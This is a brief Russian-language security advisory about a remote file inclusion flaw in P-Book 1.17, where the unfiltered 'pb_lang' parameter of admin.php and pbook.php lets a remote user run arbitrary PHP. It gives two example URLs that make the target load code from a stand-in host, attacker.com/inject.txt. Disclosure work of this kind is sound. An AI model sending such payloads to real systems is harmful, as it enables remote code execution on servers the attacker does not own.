Программа: P-Book 1.17

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «pb_lang» сценариями admin.php и pbook.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. 

Примеры: 

http://target.com/[p-book_path]/admin.php?pb_lang=http://attacker.com/inject.txt?
http://target.com/[p-book_path]/pbook.php?pb_lang=http://attacker.com/inject.txt?



Оставить мнение